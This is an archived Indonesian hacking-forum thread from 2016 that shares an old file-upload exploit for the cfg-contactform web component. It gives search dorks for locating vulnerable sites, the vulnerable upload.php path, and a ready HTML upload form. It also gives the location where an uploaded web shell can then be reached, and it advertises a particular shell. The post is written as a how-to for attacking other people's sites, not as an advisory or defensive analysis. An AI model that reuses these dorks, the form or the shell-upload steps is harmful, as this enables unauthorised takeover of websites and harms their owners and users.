+- BackBox Indonesia (https://www.backboxindonesia.or.id)
+-- Forum: Attacking (https://www.backboxindonesia.or.id/forum-12.html)
+--- Forum: Web Attack (https://www.backboxindonesia.or.id/forum-15.html)
+--- Thread: cfg-contactform Vulnerability File Upload (/thread-133.html)
cfg-contactform Vulnerability File Upload - Nue Bhandell - 05-27-2016
iseng2 share exploit lawas, kali aja masih crootz.
btw sekalian nyicip Shell BACKBOX INDONESIA WEB SHELL V1.0 (BASED ON INDOXPLOIT SHELL) dari Kang hightech.
langsung ja, Play with me Baby :heart:
Dork:
"/cfg-contactform-1/"
"/cfg-contactform-2/"
# Disini exploitnya tergantung contact form yg keberapa mas bro,
/[path]/cfg-contactform-1/inc/upload.php
Vuln? {"filename":" -001."} *trgantung dork sih
![[Image: 7b43e7787e784a25a581c140acc7a1dd.png]](http://image.prntscr.com/image/7b43e7787e784a25a581c140acc7a1dd.png)
CSRF Upload:
<form enctype="multipart/form-data"
action="target" method="post">
<input type="text" name="folder" value="./" /><br />
Please choose a file: <input name="Filedata" type="file" /><br />
<input type="submit" value="upload" />
</form>
lalu tinggal upload file/shell ente.
kalo berhasil muncul nama shell ente
![[Image: 8f90e2f76d0b402fa904af6623ff68fa.png]](http://image.prntscr.com/image/8f90e2f76d0b402fa904af6623ff68fa.png)
Shell Akses:/[path]/cfg-contactform-1/upload/namashell.php
![[Image: 50ec314b0dc94aef8937f16135eca205.png]](http://image.prntscr.com/image/50ec314b0dc94aef8937f16135eca205.png)
untuk code PHP disini
Semoga bermanfaat gengs, maap kalo tutor cupu :D
jgn lupa kunjungin Blog ane juga yak wkkww : TKJ Cyber Art
~ Bye
SUMUR